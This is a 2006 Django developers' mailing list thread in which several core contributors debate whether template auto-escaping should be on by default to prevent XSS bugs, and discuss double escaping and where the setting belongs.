IMO, the point of auto-escaping is that the template author should not have to worry about
the origin of the string, but about how he uses it. The origin of the string in the
context can change, just for an example. Or are we talking about different meanings
of the word 'origin'? I'm really not sure if I understand you correctly.

> Although having though more about this, I
> can't see that it offers any benefit over your intelligent
> auto-escaping apart from being explicit in the template. The real
> benefit of that is probably a matter of opinion.

Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
I consider it the job of the programmer, you consider it the job of the template
author. I say that the template author does not know or perhaps not even understand
where the string comes from and whether it is escaped or not; you say the template author
knows best what he uses.

It would be nice to get the opinion of somebody like Jeff Croft or Wilson Miner on this.
Does any of you follow the developers' list?


> Regardless, there's another situation that will most likely arise that
> needs to be discussed in your proposal: A string of escaped text is to
> be rendered with *further* escaping. What should happen for {{
> escaped_str|escape }}? One use case for this is a page with both a
> preview and an edit field for HTML content:
>
> {{ page_html }}
> <textarea>{{ page_html|escape }}</textarea>
> Nothing difficult to solve here, just aiming for completeness.

That's a good one! You need either:

- something to turn an escaped_string into string
- something like "really_really_escape_this"
- a template filter like "html_source" that escapes a string twice and an escaped_string once.

I'm feeling inclined towards the third option. Any use case for another layer of escaping? Then I'd really scratch my head.


>> Note that the escaping does not happen in the context, but during rendering, so that template filters
>> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.
>
> One thing that bothered me about the proposal was having the
> auto-escape property set in the context; which I believe is the wrong
> place; it should be set in the Template instance (or subclass). A
> context should be reusable between different templates (e.g. an html
> page, a JSON object, an XML page).

As long as you don't put any escaped_strings into the context, the context can be used anywhere.
But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
the usage of the context. Thus, I don't see a problem here.

Do you agree, or do you see anything I don't?

Michael

Adrian Holovaty

unread,
Jun 20, 2006, 9:36:05 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I've gotta say, I don't like the concept of auto-escaping on by
default. I'd rather not have the framework automatically munging my
data behind my back: it'd be a case of the same type of magic that we
removed in the magic-removal branch. In-bulk escaping should be an
opt-in thing, not an opt-out thing.

Adrian

--
Adrian Holovaty
holovaty.com | djangoproject.com

James Bennett

unread,
Jun 20, 2006, 9:56:44 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Adrian Holovaty <holo...@gmail.com> wrote:
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

I'm 100% in agreement. Most of Simon's proposal looks good to me,
except that I'd want to see autoescape off by default.

Michael Radziej

unread,
Jun 20, 2006, 10:11:10 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

<sarcasm>
You're against automatically quoting your data in the database driver?
Let's rip it out, bad magic that munges your data behind your back.
</sarcasm>

I haven't used the magical versions of Django, but I regard the magic that
has magically imported models a different thing. In every framework things
happen automatically, and just calling it "bad magic" is something that
might result in ending the discussion, but I personally don't consider this
a pretty good argument.

But, looking at the recent bugs in the Admin:

2006, __str__() output not escaped in breadcrumbs and filters
2152, username was not escaped

Perhaps neither of this would be fixed with auto-escaping. But I want to
emphasize that bugs like this happen all the time, are hard to spot and
are inherently dangerous. If you escape too much, you'll spot it easily,
and not much harm has been done.

Automatic quoting in the database layer is great, and does a tremendous job
stopping sql injection bugs. Automatic escaping in the template would be
just as good to stop XSS bugs.

Michael

Adrian Holovaty

unread,
Jun 20, 2006, 10:25:58 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> <sarcasm>
> You're against automatically quoting your data in the database driver?
> Let's rip it out, bad magic that munges your data behind your back.
> </sarcasm>

I figured somebody might bring up this example, but it isn't quite
analogous. With a database query, you don't really care what the
textual output (SQL) is. With a template, you do.

Simon Willison

unread,
Jun 20, 2006, 10:43:32 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 15:11, Michael Radziej wrote:

> But, looking at the recent bugs in the Admin:
>
> 2006, __str__() output not escaped in breadcrumbs and filters
> 2152, username was not escaped
>
> Perhaps neither of this would be fixed with auto-escaping. But I
> want to
> emphasize that bugs like this happen all the time, are hard to spot
> and
> are inherently dangerous. If you escape too much, you'll spot it
> easily,
> and not much harm has been done.

This is exactly why I'm for auto escaping - these bugs sneak in all
over the place; they aren't something that only affects careless or
newbie developers. I bet there's a bunch hiding in the current Django
source code.

If we did have it as an opt-in thing rather than being turned on by
default we'd also have to include a bunch of stuff in the docs saying
"we really, really strongly suggest that you opt-in to this".

I'm actually on the fence as to having it on by default - my gut
feeling is that it's a good idea, since every framework ever that
hasn't done it has been plagued by XSS problems. That said, I don't
think we can get a really good feel for how it works in practise
until we can actually play with working code - which is why I want to
build it in a branch (until we're sure that it works nicely it
definitely shouldn't be inflicted on people following trunk).

Cheers,

Simon